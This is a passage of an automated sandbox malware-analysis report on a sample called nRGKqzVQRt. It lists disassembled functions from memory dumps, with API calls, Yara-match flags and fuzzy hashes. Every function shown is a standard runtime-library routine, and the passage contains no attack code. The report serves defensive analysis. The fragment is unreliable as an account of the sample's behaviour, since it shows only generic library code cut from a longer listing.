                                                    • Part of subcall function 0040ABE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040ACD3
                                                  • std::locale::_Init.LIBCPMT ref: 0040A191
                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0040A2A8
                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0040A2AD
                                                    • Part of subcall function 004015C0: ___std_exception_copy.LIBVCRUNTIME ref: 004015FE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_std::locale::_$Concurrency::cancel_current_taskInit___std_exception_copy$SetgloballocaleYarn
                                                  • String ID:
                                                  • API String ID: 3444572950-0
                                                  • Opcode ID: 3772f73c73b648106feca3bbdd899062d8fd4c5206c57f8baaf4dcdb112cb945
                                                  • Instruction ID: 15dc990f8168f4d2899df3e18d3cde1c15f8de658f0e16a424ba317a0bc9b0b8
                                                  • Opcode Fuzzy Hash: 3772f73c73b648106feca3bbdd899062d8fd4c5206c57f8baaf4dcdb112cb945
                                                  • Instruction Fuzzy Hash: 6DA137B0900205DFDB00CF55C594B9ABBF0FF49304F1582AAE809AF792D7BAA954CF95
                                                  Function 0040FDFB Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: AdjustPointer
                                                  • String ID:
                                                  • API String ID: 1740715915-0
                                                  • Opcode ID: cfb7b64256891e6686333403dd0511379eea51aab07b80c3b7c1c719ddcf90db
                                                  • Instruction ID: e8452a54d6043e1b743c3d42dff45856ced14499e589d53c32b50beca8cb4aa0
                                                  • Opcode Fuzzy Hash: cfb7b64256891e6686333403dd0511379eea51aab07b80c3b7c1c719ddcf90db
                                                  • Instruction Fuzzy Hash: A8510472A04602AFDB349F55D841B7AB3A4EF01708F14043FE90567AE1D739EC8AC788
                                                  Function 10003EDA Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: AdjustPointer
                                                  • String ID:
                                                  • API String ID: 1740715915-0
                                                  • Opcode ID: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                                  • Instruction ID: 9e97f9b43940e94c385e873cf65d718b9a08959cb0185780d8acf6a52a646172
                                                  • Opcode Fuzzy Hash: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                                  • Instruction Fuzzy Hash: 9D51BFB6A04202AFFB16CF11D941BAB77A8EF047D0F11856DEA05A72A9DB31EC40D794
                                                  Function 00670062 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AdjustPointer
                                                  • String ID:
                                                  • API String ID: 1740715915-0
                                                  • Opcode ID: cfb7b64256891e6686333403dd0511379eea51aab07b80c3b7c1c719ddcf90db
                                                  • Instruction ID: bef5814f672ae83d0874dee4e4ccf8e4d64a0203b9483577e0a67e298415a22a
                                                  • Opcode Fuzzy Hash: cfb7b64256891e6686333403dd0511379eea51aab07b80c3b7c1c719ddcf90db
                                                  • Instruction Fuzzy Hash: 1151E272601706EFFB298F94C841BBAB7A6EF10310F64812DE84947391E772ED91C7A4
                                                  Function 00444FD3 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: __calloc_crt__init_pointers__mtterm_free
                                                  • String ID:
                                                  • API String ID: 3556499859-0
                                                  • Opcode ID: 17854ea664a45eb01664c1a20a8cf02ccb9de1dc8606da2d7d461c4ca62b6241
                                                  • Instruction ID: a0b3ace8011b5933849424b90c9485ba5dbbed8ad4db6b918f4ddbde63b50411
                                                  • Opcode Fuzzy Hash: 17854ea664a45eb01664c1a20a8cf02ccb9de1dc8606da2d7d461c4ca62b6241
                                                  • Instruction Fuzzy Hash: 3B3160759003089BFB10BF75AD0971A3EB1AF4932B710063BE900A66B2DB78C454CE5D
                                                  Function 0041E16F Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004161E8: _free.LIBCMT ref: 004161F6
                                                    • Part of subcall function 0041B58E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,0041BAF6,?,00000000,00000000), ref: 0041B63A
                                                  • GetLastError.KERNEL32 ref: 0041E1D7
                                                  • __dosmaperr.LIBCMT ref: 0041E1DE
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041E21D
                                                  • __dosmaperr.LIBCMT ref: 0041E224
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                  • String ID:
                                                  • API String ID: 167067550-0
                                                  • Opcode ID: 2ee80bc456aaba5edad49b0c82f5904c31a9c5c935df2275ad383636a5367898
                                                  • Instruction ID: bdb0a842771a8fe777460e77f8a474c5cbd3e2640c7d3f46f2ac3ce91a7366d8
                                                  • Opcode Fuzzy Hash: 2ee80bc456aaba5edad49b0c82f5904c31a9c5c935df2275ad383636a5367898
                                                  • Instruction Fuzzy Hash: CD21B275600205BFAB206F67CC819EBB7ADEE043A8310852EFD2587251D738EC818B99
                                                  Function 10007BCE Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 100081F0: _free.LIBCMT ref: 100081FE
                                                    • Part of subcall function 10008DC4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000B163,?,00000000,00000000), ref: 10008E70
                                                  • GetLastError.KERNEL32 ref: 10007C36
                                                  • __dosmaperr.LIBCMT ref: 10007C3D
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10007C7C
                                                  • __dosmaperr.LIBCMT ref: 10007C83
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                  • String ID:
                                                  • API String ID: 167067550-0
                                                  • Opcode ID: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
                                                  • Instruction ID: 4d86bd2ae757562d8160192595c5732c56f34f1228d97d68919d00ee2a874974
                                                  • Opcode Fuzzy Hash: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
                                                  • Instruction Fuzzy Hash: 9021AC75A00216AFB720DF658C85D5BB7ADFF042E4B108529FA699724ADB35EC408BA0
                                                  Function 0067E3D6 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0067644F: _free.LIBCMT ref: 0067645D
                                                    • Part of subcall function 0067B7F5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,V.h,0000FDE9,00000000,?,?,?,00682BCF,0000FDE9,00000000,?), ref: 0067B8A1
                                                  • GetLastError.KERNEL32 ref: 0067E43E
                                                  • __dosmaperr.LIBCMT ref: 0067E445
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0067E484
                                                  • __dosmaperr.LIBCMT ref: 0067E48B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                  • String ID:
                                                  • API String ID: 167067550-0
                                                  • Opcode ID: ff14c79e1395f32fed001daf36d8bf83056e63ebd13984d77e506e2a027871c6
                                                  • Instruction ID: 32a1f65e23eb84ac150400426078082bdfa03548b9edef8c6a145fc898552b37
                                                  • Opcode Fuzzy Hash: ff14c79e1395f32fed001daf36d8bf83056e63ebd13984d77e506e2a027871c6
                                                  • Instruction Fuzzy Hash: F421C171600215AFDB60AF65CC8196BB7EEEF483B8710C5A9F91C97244E732EC058BA4
                                                  Function 0044C4D3 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0044C4EE
                                                    • Part of subcall function 004421CA: __getptd.LIBCMT ref: 004421DD
                                                    • Part of subcall function 0044302A: __getptd_noexit.LIBCMT ref: 0044302A
                                                  • ___ascii_strnicmp.LIBCMT ref: 0044C561
                                                  • __tolower_l.LIBCMT ref: 0044C583
                                                  • __tolower_l.LIBCMT ref: 0044C592
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: Locale__tolower_l$UpdateUpdate::____ascii_strnicmp__getptd__getptd_noexit
                                                  • String ID:
                                                  • API String ID: 2744284823-0
                                                  • Opcode ID: fc53079f3506a87612cd62d25356a17a7fe58b84f43b47a09e679809effddfaa
                                                  • Instruction ID: 5990bd2846e973212e6052148c3277e8f9eabc76f2dbf69ab6be36eb4c05885c
                                                  • Opcode Fuzzy Hash: fc53079f3506a87612cd62d25356a17a7fe58b84f43b47a09e679809effddfaa
                                                  • Instruction Fuzzy Hash: 0121D571901265ABEB61EEA9C88577F3BA4AF40325F1C065BE420572C1EB78EE01C799
                                                  Function 00679B5F Relevance: 6.1, APIs: 4, Instructions: 77COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ab3301201762d8709fda81139749348a43ff2ca55212c488a12608a7673bf9c9
                                                  • Instruction ID: 326734504838d1fa4505021c0279ca40da321d56dfe3ccfc5f984e35bfb0d14e
                                                  • Opcode Fuzzy Hash: ab3301201762d8709fda81139749348a43ff2ca55212c488a12608a7673bf9c9
                                                  • Instruction Fuzzy Hash: 3321EB71A05220ABCF328724AC85F6B37DA9F01BA0F258525ED0AA7390DA30ED01D6F4
                                                  Function 00418E23 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,7622DF80,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418E28
                                                  • _free.LIBCMT ref: 00418E85
                                                  • _free.LIBCMT ref: 00418EBB
                                                  • SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418EC6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: 35dc7ff6f55437eeeeb352e0fc4fc1d9e7ee3fa865eb4c34cbbeba1caba4d7a2
                                                  • Instruction ID: 0e464f2806eaeac5f9ced7654bcd696cc8e1c911a26352911ac68216619f9860
                                                  • Opcode Fuzzy Hash: 35dc7ff6f55437eeeeb352e0fc4fc1d9e7ee3fa865eb4c34cbbeba1caba4d7a2
                                                  • Instruction Fuzzy Hash: 8311E0723097057ACF212A76AC95EEB22599BC17A8B25063FF125C22E1DE6D8CC6512C
                                                  Function 10006E9C Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006EA1
                                                  • _free.LIBCMT ref: 10006EFE
                                                  • _free.LIBCMT ref: 10006F34
                                                  • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006F3F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
                                                  • Instruction ID: 52538b18816049bcedc1269911990ba1ec418b01f35f7c97631a1a3369067357
                                                  • Opcode Fuzzy Hash: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
                                                  • Instruction Fuzzy Hash: BE11E33AA006566AF242D674DC81E6F328BEBC92F57310134F528921D9DE74DE094631
                                                  Function 0067908A Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(006620FF,?,00662103,006716D8,?,006620FF,004280A0,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067908F
                                                  • _free.LIBCMT ref: 006790EC
                                                  • _free.LIBCMT ref: 00679122
                                                  • SetLastError.KERNEL32(00000000,00437188,000000FF,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067912D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: 3ed6f2ded7a2700062d3b3421f2a383b3c8afcfe95e6ce1d9bee78e28f59b4db
                                                  • Instruction ID: eaaba3ad0b3f26dcc8de7e2f306d23e649f4dc23bdab8a8dc306ebaca0a58f13
                                                  • Opcode Fuzzy Hash: 3ed6f2ded7a2700062d3b3421f2a383b3c8afcfe95e6ce1d9bee78e28f59b4db
                                                  • Instruction Fuzzy Hash: D51106723442027BDBA17378AC86D6B25DB8BC2374B24823CF62C863E1DE708C165138
                                                  Function 00418F7A Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,00411406,0041A3D8,?,?,0040E15B,?,?,?,004010DD,?,00403497,?,?), ref: 00418F7F
                                                  • _free.LIBCMT ref: 00418FDC
                                                  • _free.LIBCMT ref: 00419012
                                                  • SetLastError.KERNEL32(00000000,00000008,000000FF,?,0040E15B,?,?,?,004010DD,?,00403497,?,?,?), ref: 0041901D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: 9e0c420a71d57c1eac789ddee66fb36f0bc41bda3a2acfdfdc4fdc3ec7323778
                                                  • Instruction ID: 81bc8fc7cbd95881107e9ffec5a672ab3f5eab8e02c6baa7b337ffd9db964308
                                                  • Opcode Fuzzy Hash: 9e0c420a71d57c1eac789ddee66fb36f0bc41bda3a2acfdfdc4fdc3ec7323778
                                                  • Instruction Fuzzy Hash: ED1182723096013A9B212B76AC95EEB265A9BC1378725023FF515832D1DE6D8CC6612D
                                                  Function 10006FF3 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,1000592B,10007A62,?,?,100066F0), ref: 10006FF8
                                                  • _free.LIBCMT ref: 10007055
                                                  • _free.LIBCMT ref: 1000708B
                                                  • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,1000592B,10007A62,?,?,100066F0), ref: 10007096
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
                                                  • Instruction ID: 7e0a2054198a3f627b51ebbd791d94cb99ce3d76a099f8cfcb9b0e2a4681bd24
                                                  • Opcode Fuzzy Hash: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
                                                  • Instruction Fuzzy Hash: B8110236E00514AAF352C6748CC5E6F328AFBC92F17210724F52C921EADE79DE048631
                                                  Function 006791E1 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,0067166D,0067A63F,?,?,0066E3C2,?,?,?,00661344,?,006636FE,?,?), ref: 006791E6
                                                  • _free.LIBCMT ref: 00679243
                                                  • _free.LIBCMT ref: 00679279
                                                  • SetLastError.KERNEL32(00000000,00437188,000000FF,?,0066E3C2,?,?,?,00661344,?,006636FE,?,?,?), ref: 00679284
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: d4e8bbadb4119975c1914609911bc9be28093772f9516ce2b5bebb24b6cefd60
                                                  • Instruction ID: 8e8ea4547c373c43c0e8c8839ff1d3c5790221e92a174b4c9bbf7d33a9388589
                                                  • Opcode Fuzzy Hash: d4e8bbadb4119975c1914609911bc9be28093772f9516ce2b5bebb24b6cefd60
                                                  • Instruction Fuzzy Hash: B71108727682013ADBA173786C82D6B31DB9BC2774725823CF13C823E3EE618D025538
                                                  Function 00670FEE Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,006710AF,?,?,00438470,00000000,?,006711DA,00000004,00429BA4,00429B9C,00429BA4,00000000), ref: 0067107E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: b02907538fd99b55170e1f1008d4e2625caf0628eb1d99c908a259ed80e5b8af
                                                  • Instruction ID: 296f0f3812af10b8511fec56b4b4b0acda9b8ab644f784729a80686eb17a30e3
                                                  • Opcode Fuzzy Hash: b02907538fd99b55170e1f1008d4e2625caf0628eb1d99c908a259ed80e5b8af
                                                  • Instruction Fuzzy Hash: A811A731A41265ABDF32476C9C41B9D77A5AF03760F158126F908EF380DE70ED8186E4
                                                  Function 0044D188 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                  • String ID:
                                                  • API String ID: 3016257755-0
                                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                  • Instruction ID: e0c668815703d1d59582e6ca7f758466f92a31949dcfe0f64d421cfcc3a852cc
                                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                  • Instruction Fuzzy Hash: 2611803244014EBBDF265E84CC41CEE3F23BB19354F18895AFE1959130C33AC9B2AB89
                                                  Function 00447CE9 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • __getptd.LIBCMT ref: 00447CF5
                                                    • Part of subcall function 00444E8A: __getptd_noexit.LIBCMT ref: 00444E8D
                                                    • Part of subcall function 00444E8A: __amsg_exit.LIBCMT ref: 00444E9A
                                                  • __amsg_exit.LIBCMT ref: 00447D15
                                                  • __lock.LIBCMT ref: 00447D25
                                                  • _free.LIBCMT ref: 00447D55
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                  • String ID:
                                                  • API String ID: 3170801528-0
                                                  • Opcode ID: fd68ba0e788f4be4d7a00be197a65ee7ad184e4e4821859db9fe28f15118f46c
                                                  • Instruction ID: b35939f623d063ddefa623e84f5d7e38cc17f234ab8fc3f37df43591ee48b569
                                                  • Opcode Fuzzy Hash: fd68ba0e788f4be4d7a00be197a65ee7ad184e4e4821859db9fe28f15118f46c
                                                  • Instruction Fuzzy Hash: 2101A1B2D08B11EBF711AF65980676E7360BF4471AF14401BE81067692CB3C9A83CBDD
                                                  Function 00425712 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • WriteConsoleW.KERNEL32(00000000,00000020,00000000,00000000,00000000,?,004253BF,00000000,00000001,00000000,00000000,?,0042263E,?,00000000,00000000), ref: 00425729
                                                  • GetLastError.KERNEL32(?,004253BF,00000000,00000001,00000000,00000000,?,0042263E,?,00000000,00000000,?,00000000,?,00422B8A,004244B3), ref: 00425735
                                                    • Part of subcall function 004256FB: CloseHandle.KERNEL32(FFFFFFFE,00425745,?,004253BF,00000000,00000001,00000000,00000000,?,0042263E,?,00000000,00000000,?,00000000), ref: 0042570B
                                                  • ___initconout.LIBCMT ref: 00425745
                                                    • Part of subcall function 004256BD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004256EC,004253AC,00000000,?,0042263E,?,00000000,00000000,?), ref: 004256D0
                                                  • WriteConsoleW.KERNEL32(00000000,00000020,00000000,00000000,?,004253BF,00000000,00000001,00000000,00000000,?,0042263E,?,00000000,00000000,?), ref: 0042575A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                  • String ID:
                                                  • API String ID: 2744216297-0
                                                  • Opcode ID: 53cd3a76a3655e62aab72a6b20d7f3bfc1b13ff990dc26beec92c4dbadd610bd
                                                  • Instruction ID: 5c91372ddcb3b0269811c4be46270c2a59ba6c8506d041d04a9d6cbd44174935
                                                  • Opcode Fuzzy Hash: 53cd3a76a3655e62aab72a6b20d7f3bfc1b13ff990dc26beec92c4dbadd610bd
                                                  • Instruction Fuzzy Hash: 69F03736601528BBCF322F91EC0499E3F26FF443B0F854025FB4D95130CA32C9619B98
                                                  Function 1000CD22 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001), ref: 1000CD39
                                                  • GetLastError.KERNEL32(?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001,?,1000BFFB,10009A1A), ref: 1000CD45
                                                    • Part of subcall function 1000CD0B: CloseHandle.KERNEL32(FFFFFFFE,1000CD55,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001), ref: 1000CD1B
                                                  • ___initconout.LIBCMT ref: 1000CD55
                                                    • Part of subcall function 1000CCCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000CCFC,1000C7D5,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CCE0
                                                  • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CD6A
                                                  Memory Dump Source
